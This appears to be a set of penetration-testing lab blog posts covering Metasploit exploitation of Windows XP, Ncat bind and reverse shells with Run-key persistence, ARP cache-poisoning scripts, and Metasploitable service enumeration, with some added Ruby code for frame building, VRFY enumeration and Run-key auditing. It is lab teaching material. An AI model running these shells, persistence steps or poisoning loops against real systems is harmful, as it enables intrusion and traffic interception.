Channel: Pax Pentest » Exploit

Metasploit: My First Successful Armitage Exploit


I just completed my first successful exploit in the marvellous Metasploit GUI Armitage.

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

First up, I added the “Host” which is the target IP address.

Then I right-clicked the host and ran the scan, which bundles several of Metasploit's built-in auxiliary scanners (ftp, smtp, http, smb_version), each gathering information on the target.

[screenshot: armitageaddhost]

Note that the host icon now bears the Windows logo, the operating system detected during the scan.

Then up to the toolbar Attacks >> Find attacks.

[screenshot: armitagefindattacks]

Once complete we can right-click the “Host” and select “Attack” which gives us a list of potential exploits.

At this point I cheated: my very first command-line Metasploit exploit against this machine had been exploit/windows/smb/ms08_067_netapi, so I simply picked it from the smb entries in the drop-down list.

But first I ran the exploit's check against the host:

[screenshot: netapiexploit]

So I launched the attack and within a few seconds the “Host” terminal image changed:

[screenshot: compromisedhost]

The red terminal with electrical jolts indicates a compromised target.

Here’s the Output of the process:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 20855
LPORT => 20855
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:57239 -> 192.168.1.79:20855) at 2013-09-02 18:27:27 +0100

meterpreter >

As you can see, I have obtained a Meterpreter shell.

Right-clicking on the “Host” image now gives me “Meterpreter” in the dropdown with every conceivable option available at the click of a finger.

Metasploit Armitage is a fabulous tool.

Next time I’ll look to compromise an Ubuntu system that I’ve never exploited before.


Setting up a simple backdoor shell using Ncat via Metasploit Armitage


First I exploited my Windows system with Metasploit Armitage obtaining a Meterpreter shell as per this post.

Then I needed to upload ncat.exe (which I downloaded from here) to the target machine. In Armitage this is a breeze: simply right-click the compromised host >> Meterpreter 1 >> Explore >> Browse Files. This gives you a nice listing of the files on the exploited machine:

[screenshot: armitagebrowsefiles]

Notice the “Upload” button from which we transfer files over on to the target system. Once complete you can refresh and check your file is indeed within the C:\WINDOWS\system32 directory. Once found right-click the file and “Execute” which brings up the “Input Arguments” box:

[screenshot: executefile]

As you can see I entered -l 23 -e cmd: listen (-l) on port 23 and, when a client connects, execute (-e) cmd.exe with its input and output wired to the socket, so the caller gets a command shell.

I then opened a terminal on the attacking machine and connected to the Ncat listener on the target machine:

~# ncat 192.168.1.79 23    # target IP and the port the listener was started on

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

And as you can see this connection was successful. I can now close Metasploit and continue with this connection.

One thing to be aware of: by default Ncat exits once the first connection closes, even when started with -e, so a disconnect takes the backdoor down with it. Adding -k (--keep-open) to the listener's arguments makes it keep accepting connections after one is terminated.

It’s also worth noting that this is a non-persistent connection in that once the target machine is rebooted the connection is no longer available without executing the Ncat listener. This can be overcome through ensuring the Ncat.exe program is executed on start-up.

I’ll try to blog the solution to this and also create a reverse connection.

Creating a persistent Ncat backdoor in Windows XP startup using Metasploit


I couldn’t figure out how to do this in Armitage and so had to resort to the good ol’ Terminal.

I exploited the XP system as per this post and obtained a Meterpreter shell.

First to upload the Ncat.exe file to the target machine:

meterpreter > upload ncat.exe c:\\windows\\system32
[*] uploading : ncat.exe -> c:\windows\system32
[*] uploaded : ncat.exe -> c:\windows\system32\ncat.exe
meterpreter >

Next we need to get Ncat to execute on startup so we manipulate the Windows Registry:

[screenshot: registrycode]

The above is an image because pasting the command in broke the WordPress formatting.

Note that the Ncat arguments (-l and the port number, 5777) are set in this registry value.

We can double check our program is in the registry:

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (5):

VMware hqtray
TgZcTlqTJNmSbP
TIOzUGrTHgMzS
zmvSLZpTksgWih
ncat

meterpreter >

As we can see, ncat is included.

Now to reboot the target XP machine and see if we can establish a connection:

# ncat 192.168.1.79 5777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Lab1>

Voilà

Two issues to note.

Firstly, a great big command window opens at startup; if the user closes it, our connection is terminated.

Secondly, I haven’t dealt with any tricky firewall issues that may prevent the inbound connection.

However, as a proof of concept, it works perfectly and I’m sure there are ways to prevent the command box opening so that the Ncat program runs without alerting the user.
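The other side of this persistence trick is spotting it. As an added example, not code from the original post, here is a small audit of the Run key in Ruby: it parses the text that `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` prints and flags any value that starts a network tool listening with its socket handed to a program. The transcript it runs over is constructed for this example; only the "ncat" value mirrors the post, the other two value names are invented.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original post): audit the Run key for entries of
# the kind created above. RUN_KEY_OUTPUT is a constructed transcript of
#   reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# in the layout Windows prints; "VMware hqtray" and "Updater" are invented.

RUN_KEY_OUTPUT = <<~REG
  HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
      VMware hqtray    REG_SZ    "C:\\Program Files\\VMware\\VMware Tools\\hqtray.exe"
      ncat             REG_SZ    C:\\WINDOWS\\system32\\ncat.exe -l 5777 -e cmd
      Updater          REG_SZ    C:\\Program Files\\Vendor\\updater.exe /quiet
REG

LISTEN_FLAGS = %w[-l --listen].freeze
EXEC_FLAGS   = %w[-e --exec -c --sh-exec].freeze
SHELL_TOOLS  = /\b(ncat|nc|netcat|socat|powercat)(\.exe)?\b/i

# Each value line is "<name>  <type>  <data>", separated by runs of spaces. A
# value name may contain a single space ("VMware hqtray"), hence \s{2,}.
def parse_run_key(text)
  text.each_line.map do |line|
    m = line.chomp.match(/\A\s+(.+?)\s{2,}(REG_\w+)\s{2,}(.*)\z/)
    m && { name: m[1], type: m[2], command: m[3].strip }
  end.compact
end

# Why an autorun command looks like a backdoor: a known shell-shovelling tool,
# a listen flag, and a flag that attaches a program to the connection.
def suspicious_reasons(command)
  tokens  = command.split
  reasons = []
  reasons << "runs a network tool (#{Regexp.last_match(1)})" if command =~ SHELL_TOOLS
  listen = tokens & LISTEN_FLAGS
  exec   = tokens & EXEC_FLAGS
  reasons << "listens for connections (#{listen.join(' ')})" unless listen.empty?
  reasons << "hands the socket to a program (#{exec.join(' ')})" unless exec.empty?
  reasons
end

def audit_run_key(text)
  parse_run_key(text).map do |entry|
    reasons = suspicious_reasons(entry[:command])
    reasons.empty? ? nil : entry.merge(reasons: reasons)
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  audit_run_key(RUN_KEY_OUTPUT).each do |hit|
    puts "#{hit[:name]}: #{hit[:command]}"
    hit[:reasons].each { |r| puts "  - #{r}" }
  end
end
```

Run against a real box, feed it the output of `reg query` (or of Meterpreter's `reg enumval`) instead of the constructed string; the same three signals apply to HKCU's Run key and to the RunOnce keys.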

Ncat Reverse Shell (Shell Shovelling)


This will probably be my last Ncat post for now as I really must get on with other things. If you want a comprehensive Ncat tutorial then hop over to IronGeek. Ncat really is a superb tool.

Previous posts have focussed on connecting to Ncat from a remote machine and, although great fun, in the real world the inbound connection would most likely be blocked by a firewall. One way around this is a reverse shell, in which the target machine reaches out to us. Outbound connections are usually far less restricted than inbound ones.

First we set up the Ncat listener on my machine (IP 192.168.1.70):

:~# ncat -l 8008    # listen on port 8008

Then the reverse shell on the target Windows machine:

C:\Documents and Settings\Lab1> ncat 192.168.1.70 8008 -e cmd    # connect to 192.168.1.70 on port 8008 and attach a command shell

Result on my machine:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Lab1>

Job done.

I wonder if it is possible to have Ncat run a reverse shell on startup similar to the backdoor example I blogged?

Ruby PacketFu: ARP Packet Spoofing and Cache Poisoning


My very good online friend Adam has been reading my recent PacketFu blog posts and today sent me the challenge of ARP cache poisoning. And what an excellent challenge it has been. I knew vaguely of ARP cache poisoning but nothing concrete, and so had to learn about the protocol, the principle of ARP packet spoofing and cache poisoning, and then figure out how to do the same in PacketFu. Boy, I've learnt a lot today.

Here’s how I did it:

require "packetfu"
x = PacketFu::ARPPacket.new(:flavor => "Windows")   # new ARP packet object
x.eth_saddr = "04:7d:7b:c5:98:cf"                   # attacking MAC address
x.eth_daddr = "00:0c:76:17:a4:17"                   # target MAC address
x.arp_saddr_mac = "04:7d:7b:c5:98:cf"               # attacking MAC address
x.arp_daddr_mac = "00:0c:76:17:a4:17"               # target MAC address
x.arp_saddr_ip = "192.168.1.254"                    # "spoofed" router IP address
x.arp_daddr_ip = "192.168.1.79"                     # target IP address
x.arp_opcode = 2                                    # ARP "reply"
x.to_w("eth0")                                      # put the packet on the wire

It all looks so simple laid out like this.

Once I rebooted the target machine and ran arp -a at its command prompt, the MAC address listed for the router IP had indeed changed to the attacking machine's, and the target's traffic started showing up in Wireshark on the attacking machine.

I could no longer access the Internet from the target machine, because the attacker was now receiving the target's traffic but not passing it on. The next stage would be forwarding that traffic on to the real router: on Linux that means enabling IP forwarding (sysctl net.ipv4.ip_forward=1) and poisoning the router's entry for the target as well, so that replies come back through the attacker too.

But that’s for another day.

Thanks again to Adam who bears the brunt every time I’m stuck with something and does so with extraordinary patience ;-)

UPDATE: I have blogged this, including an infinite loop with 30-second intervals.

Ruby PacketFu: ARP Packet Spoofing and Cache Poisoning Infinite Looping Every 30 Seconds


Following on from my last post on ARP Packet Spoofing and Cache Poisoning using PacketFu, Adam advised me:

Just a helpful tip: the ARP address entry will revert back to the original. ARP requests are sent on a regular basis, so your spoofed address will be replaced with the correct one at some point. If you are running it as a program you just need to loop it on a time interval (60 seconds or so).

So I needed the code to loop on a time interval. This was achieved (eventually, thanks to @zyx2k) by creating an infinite loop with a 30-second sleep between iterations.

I’ve written the below code so that you can change the parameters, copy & paste, and run it in a Ruby file if you wish:

#!/usr/bin/env ruby
# encoding: UTF-8
require "packetfu"

puts "Sending ARP packet spoof every 30 seconds..."
x = PacketFu::ARPPacket.new(:flavor => "Windows")   # flavor can be changed to Linux or hp_deskjet
x.eth_saddr = "04:7d:7b:c5:98:cf"                   # set your MAC address
x.eth_daddr = "00:0c:76:17:a4:17"                   # set victim MAC address
x.arp_saddr_mac = "04:7d:7b:c5:98:cf"               # set your MAC address
x.arp_daddr_mac = "00:0c:76:17:a4:17"               # set victim MAC address
x.arp_saddr_ip = "192.168.1.254"                    # router IP address
x.arp_daddr_ip = "192.168.1.79"                     # victim IP address
x.arp_opcode = 2                                    # ARP reply code
loop do                                             # infinite loop
  x.to_w("wlan0")                                   # put packet on the wire; change to eth0 if needed
  sleep(30)                                         # "sleep" interval in seconds, change to your preference
end
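PacketFu hides what the two scripts above actually put on the wire. As an added example that is not part of either post and does not use PacketFu, here is the same 42-byte Ethernet/ARP reply built by hand, a decoder to read it back, and the re-send loop with the sender pluggable so it runs offline. The MAC and IP addresses are the ones used in the posts; nothing here touches a network interface (to inject the bytes for real you would hand them to PacketFu's injector, which needs root, as the comment notes).

```ruby
#!/usr/bin/env ruby
# Added example, not from the original posts: the Ethernet + ARP reply the
# PacketFu scripts send, built field by field, decoded back, and re-sent on a
# timer through a caller-supplied block. Addresses are the posts' lab values.

ATTACKER_MAC = "04:7d:7b:c5:98:cf"
VICTIM_MAC   = "00:0c:76:17:a4:17"
ROUTER_IP    = "192.168.1.254"
VICTIM_IP    = "192.168.1.79"

ETHERTYPE_ARP = 0x0806
ARP_REPLY     = 2

def mac_bytes(mac)
  mac.split(":").map { |h| h.to_i(16) }.pack("C6")
end

def ip_bytes(ip)
  ip.split(".").map(&:to_i).pack("C4")
end

def fmt_mac(bytes)
  bytes.unpack("C6").map { |b| format("%02x", b) }.join(":")
end

def fmt_ip(bytes)
  bytes.unpack("C4").join(".")
end

# Ethernet II: dst(6) src(6) type(2)
# ARP: htype(2)=1 Ethernet, ptype(2)=0x0800 IPv4, hlen(1)=6, plen(1)=4, opcode(2),
#      sender MAC(6), sender IP(4), target MAC(6), target IP(4)
def build_arp_reply(eth_src:, eth_dst:, sender_mac:, sender_ip:, target_mac:, target_ip:)
  eth = mac_bytes(eth_dst) + mac_bytes(eth_src) + [ETHERTYPE_ARP].pack("n")
  arp = [1, 0x0800, 6, 4, ARP_REPLY].pack("nnCCn") +
        mac_bytes(sender_mac) + ip_bytes(sender_ip) +
        mac_bytes(target_mac) + ip_bytes(target_ip)
  eth + arp
end

# The poisoning frame: "192.168.1.254 is at <attacker MAC>", addressed to the victim.
def spoofed_gateway_reply
  build_arp_reply(eth_src: ATTACKER_MAC, eth_dst: VICTIM_MAC,
                  sender_mac: ATTACKER_MAC, sender_ip: ROUTER_IP,
                  target_mac: VICTIM_MAC,   target_ip: VICTIM_IP)
end

def decode_arp(frame)
  raise ArgumentError, "frame too short" if frame.bytesize < 42
  d = frame.unpack("a6a6nnnCCna6a4a6a4")
  raise ArgumentError, "not an ARP frame" unless d[2] == ETHERTYPE_ARP
  { eth_dst: fmt_mac(d[0]), eth_src: fmt_mac(d[1]), opcode: d[7],
    sender_mac: fmt_mac(d[8]), sender_ip: fmt_ip(d[9]),
    target_mac: fmt_mac(d[10]), target_ip: fmt_ip(d[11]) }
end

# Re-send on an interval, like the `loop do ... sleep(30)` script. The block
# receives the raw frame; with PacketFu (root required) it could be
#   ->(f) { PacketFu::Inject.new(:iface => "eth0").array_to_wire(:array => [f]) }
# Returns how many frames were handed to the block.
def poison_loop(frame, interval: 30, rounds: Float::INFINITY)
  sent = 0
  while sent < rounds
    yield frame
    sent += 1
    sleep(interval) if sent < rounds
  end
  sent
end

if __FILE__ == $PROGRAM_NAME
  frame = spoofed_gateway_reply
  puts "#{frame.bytesize} bytes: #{frame.unpack1('H*')}"
  puts decode_arp(frame).inspect
  poison_loop(frame, interval: 0, rounds: 3) { |f| puts "would send #{f.bytesize} bytes" }
end
```

Because the loop takes a block, the same code drives a real injector, a pcap writer, or a test double; the decoder is also what you would run over a capture to confirm the victim is receiving replies whose sender IP is the gateway but whose sender MAC is not.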

Metasploitable 2: Port 23 Open Telnet


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
23/tcp    open  telnet      Linux telnetd

Most of the information on the Internet talks of using a password cracking tool for this Telnet service; however, there is another way using a Metasploit scanner:

msf > search telnet
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name                                                Disclosure Date  Rank       Description
—-                                                —————  —-       ———–
auxiliary/admin/http/dlink_dir_300_600_exec_noauth  2013-02-04       normal     D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof        2010-12-21       normal     Microsoft IIS FTP Server Encoded Response Overflow Trigger
auxiliary/scanner/telnet/lantronix_telnet_password                   normal     Lantronix Telnet Password Recovery
auxiliary/scanner/telnet/lantronix_telnet_version                    normal     Lantronix Telnet Service Banner Detection
auxiliary/scanner/telnet/telnet_encrypt_overflow                     normal     Telnet Service Encyption Key ID Overflow Detection
auxiliary/scanner/telnet/telnet_login                                normal     Telnet Login Check Scanner
auxiliary/scanner/telnet/telnet_ruggedcom                            normal     RuggedCom Telnet Password Generator
auxiliary/scanner/telnet/telnet_version                              normal     Telnet Service Banner Detection
auxiliary/server/capture/telnet                                      normal     Authentication Capture: Telnet
exploit/freebsd/ftp/proftp_telnet_iac               2010-11-01       great      ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
exploit/freebsd/telnet/telnet_encrypt_keyid         2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer Overflow
exploit/linux/ftp/proftp_telnet_iac                 2010-11-01       great      ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (Linux)
exploit/linux/http/dlink_diagnostic_exec_noauth     2013-03-05       excellent  D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
exploit/linux/http/dlink_dir300_exec_telnet         2013-04-22       excellent  D-Link Devices Unauthenticated Remote Command Execution
exploit/linux/http/dlink_upnp_exec_noauth_telnetd   2013-07-05       excellent  D-Link Devices UPnP SOAP Telnetd Command Execution
exploit/linux/telnet/telnet_encrypt_keyid           2011-12-23       great      Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
exploit/solaris/telnet/fuser                        2007-02-12       excellent  Sun Solaris Telnet Remote Authentication Bypass Vulnerability
exploit/solaris/telnet/ttyprompt                    2002-01-18       excellent  Solaris in.telnetd TTYPROMPT Buffer Overflow
exploit/unix/webapp/dogfood_spell_exec              2009-03-03       excellent  Dogfood CRM spell.php Remote Command Execution
exploit/windows/proxy/ccproxy_telnet_ping           2004-11-11       average    CCProxy <= v6.2 Telnet Proxy Ping Overflow
exploit/windows/telnet/gamsoft_telsrv_username      2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
exploit/windows/telnet/goodtech_telnet              2005-03-15       average    GoodTech Telnet Server <= 5.0.6 Buffer Overflow
payload/cmd/unix/reverse                                             normal     Unix Command Shell, Double reverse TCP (telnet)
payload/cmd/unix/reverse_bash_telnet_ssl                             normal     Unix Command Shell, Reverse TCP SSL (telnet)
payload/cmd/unix/reverse_ssl_double_telnet                           normal     Unix Command Shell, Double Reverse TCP SSL (telnet)
post/windows/gather/credentials/mremote                              normal     Windows Gather mRemote Saved Password Extraction

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

Name      Current Setting  Required  Description
—-      —————  ——–  ———–
PASSWORD                   no        The password for the specified username
RHOSTS                     yes       The target address range or CIDR identifier
RPORT     23               yes       The target port
THREADS   1                yes       The number of concurrent threads
TIMEOUT   30               yes       Timeout for the Telnet probe
USERNAME                   no        The username to authenticate as

msf auxiliary(telnet_version) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(telnet_version) > set RPORT 23
RPORT => 23
msf auxiliary(telnet_version) > run

[*] 192.168.1.103:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >

If we look carefully at the Telnet banner we can see "Login with msfadmin/msfadmin", and so, armed with the username and password, we can connect from the attacking terminal:

# telnet 192.168.1.103
Trying 192.168.1.103…
Connected to 192.168.1.103.
Escape character is ‘^]’.
_                  _       _ _        _     _      ____
_ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|

Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started

metasploitable login: msfadmin
Password:
Last login: Tue Nov  5 13:12:09 EST 2013 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

No mail.
To run a command as administrator (user “root”), use “sudo <command>”.
See “man sudo_root” for details.

msfadmin@metasploitable:~$

Metasploitable 2: Port 25 Open SMTP Postfix SMTPD


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd

Despite researching the Postfix email service, I haven't uncovered an exploit; however, we can enumerate user information via Metasploit's scanner:

msf > search postfix smtp
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name                                                    Disclosure Date  Rank       Description
—-                                                    —————  —-       ———–
auxiliary/client/smtp/emailer                                            normal     Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan                     2003-09-17       normal     Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange            2004-11-12       normal     MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer                                       normal     SMTP Simple Fuzzer
auxiliary/scanner/smtp/smtp_enum                                         normal     SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_relay                                        normal     SMTP Open Relay Detection
auxiliary/scanner/smtp/smtp_version                                      normal     SMTP Banner Grabber
auxiliary/server/capture/smtp                                            normal     Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii                                          normal     VSploit Email PII
exploit/linux/misc/gld_postfix                          2005-04-12       good       GLD (Greylisting Daemon) Postfix Buffer Overflow
exploit/linux/smtp/exim4_dovecot_exec                   2013-05-03       excellent  Exim and Dovecot Insecure Configuration Command Injection
exploit/unix/smtp/clamav_milter_blackhole               2007-08-24       excellent  ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format                   2010-12-07       excellent  Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin             2007-07-09       manual     SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex       2010-05-19       great      CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress       2009-08-28       normal     Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw       2003-12-29       great      MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo              2004-10-26       good       TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5                   2007-08-18       great      Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50      2003-10-15       good       MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof                    2011-10-31       normal     NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver                        2005-07-11       average    SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1                    2004-09-27       average    YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct                        2004-04-13       average    Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook                                  normal     Windows Gather Microsoft Outlook Saved Password Extraction

msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

Name       Current Setting                                              Required  Description
—-       —————                                              ——–  ———–
RHOSTS                                                                  yes       The target address range or CIDR identifier
RPORT      25                                                           yes       The target port
THREADS    1                                                            yes       The number of concurrent threads
UNIXONLY   true                                                         yes       Skip Microsoft bannered servers when testing unix users
USER_FILE  /opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf auxiliary(smtp_enum) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103

msf auxiliary(smtp_enum) > set RPORT 25
RPORT => 25
msf auxiliary(smtp_enum) > run

[*] 192.168.1.103:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 192.168.1.103:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, users have been identified, which might be useful in further attacks, especially if any of the passwords are the same as the username.

I did connect to the Postfix email service via Telnet:

# telnet 192.168.1.103 25
Trying 192.168.1.103…
Connected to 192.168.1.103.
Escape character is ‘^]’.
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

I attempted to log on using the above user credentials, but was greeted with:

503 5.5.1 Error: authentication not enabled

So the connection itself is fine; the 503 means this Postfix does not offer SMTP AUTH at all, so there is no logon to attempt here. The user enumeration above works without any credentials because Postfix still answers VRFY, which is the command smtp_enum drives.
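To make the exchange behind smtp_enum concrete, here is an added example that is not from the post and not the Metasploit module: the VRFY dialogue with both sides shown, run against a scripted stand-in for the Metasploitable 2 Postfix so that it works offline. The known account names are taken from the module output above; the reply texts are modelled on Postfix's standard responses (252 for a local name it will accept, 550 for an unknown one, 502 when VRFY is disabled, and the 503 for AUTH the post ran into), and the scripted server is this example's own.

```ruby
#!/usr/bin/env ruby
# Added example, not from the post or Metasploit: SMTP user enumeration over
# VRFY, with a scripted Postfix look-alike so it runs with no network.

KNOWN_USERS = %w[backup bin daemon ftp mail postgres www-data].freeze

# Minimal scripted SMTP peer. Replies are modelled on Postfix's wording.
class FakePostfix
  attr_reader :log

  def initialize(known_users, vrfy_disabled: false)
    @known = known_users
    @vrfy_disabled = vrfy_disabled
    @greeted = false
    @log = []
  end

  def greeting
    "220 metasploitable.localdomain ESMTP Postfix (Ubuntu)\r\n"
  end

  def handle(line)
    @log << line
    verb, arg = line.split(" ", 2)
    case verb.to_s.upcase
    when "HELO", "EHLO"
      @greeted = true
      "250 metasploitable.localdomain\r\n"
    when "AUTH"
      "503 5.5.1 Error: authentication not enabled\r\n"
    when "VRFY"
      return "503 5.5.1 Error: send HELO/EHLO first\r\n" unless @greeted
      return "502 5.5.1 VRFY command is disabled\r\n" if @vrfy_disabled
      name = arg.to_s.strip
      if @known.include?(name)
        "252 2.0.0 #{name}\r\n"
      else
        "550 5.1.1 <#{name}>: Recipient address rejected: User unknown in local recipient table\r\n"
      end
    when "QUIT"
      "221 2.0.0 Bye\r\n"
    else
      "502 5.5.2 Error: command not recognized\r\n"
    end
  end
end

# Transport over the scripted server: every line written queues the reply.
class ScriptedTransport
  def initialize(server)
    @server = server
    @pending = [server.greeting]
  end

  def write_line(line)
    @pending << @server.handle(line)
  end

  def read_line
    @pending.shift
  end
end

# Same interface over a real socket:
#   require "socket"; SocketTransport.new(TCPSocket.new("192.168.1.103", 25))
class SocketTransport
  def initialize(sock) = @sock = sock
  def write_line(line) = @sock.write("#{line}\r\n")
  def read_line = @sock.gets
end

# SMTP replies may span lines ("250-..." continues, "250 ..." ends).
def read_reply(transport)
  lines = []
  loop do
    line = transport.read_line
    raise "connection closed" if line.nil?
    lines << line
    break unless line[3] == "-"
  end
  lines
end

def smtp_enum(transport, candidates, helo: "scanner.lab")
  banner = read_reply(transport).first.strip
  transport.write_line("EHLO #{helo}")
  read_reply(transport)
  found = candidates.select do |user|
    transport.write_line("VRFY #{user}")
    code = read_reply(transport).last[0, 3].to_i
    # 250 = verified, 252 = "cannot verify but will accept" (Postfix's answer for
    # a real local name), 550 = unknown. Anything else (e.g. 502 with
    # disable_vrfy_command = yes) means VRFY is not a usable oracle: stop.
    raise "VRFY not usable on this server (got #{code})" unless [250, 252, 550].include?(code)
    code != 550
  end
  transport.write_line("QUIT")
  read_reply(transport)
  { banner: banner, found: found }
end

if __FILE__ == $PROGRAM_NAME
  server = FakePostfix.new(KNOWN_USERS)
  result = smtp_enum(ScriptedTransport.new(server), %w[backup bin nosuchuser postgres root])
  puts result[:banner]
  puts "users found: #{result[:found].join(', ')}"
end
```

The failure mode worth knowing: a Postfix with `disable_vrfy_command = yes` answers 502 to every VRFY, and a scanner that treats "not 550" as "exists" would then report every candidate as valid; the enumerator above stops instead of guessing.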


Metasploitable 2: Port 53 ISC BIND 9.4.2 – Domain Name Server Cache Poisoning


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
53/tcp    open  domain      ISC BIND 9.4.2

It's worth noting at the outset that neither of the Metasploit auxiliary modules below worked for me; however, I spent so much time researching and testing, and learned so much while doing so, that I'm going to detail the vulnerability anyway, as you might have success with it.

The premise of this DNS vulnerability is injecting spoofed records into the resolver's cache so that a name is bound to an attacker-chosen address. The consequence is that the user requests one website and a completely different one is served up.

The first module I tried was Metasploit's bailiwicked_domain auxiliary:

Description
===========

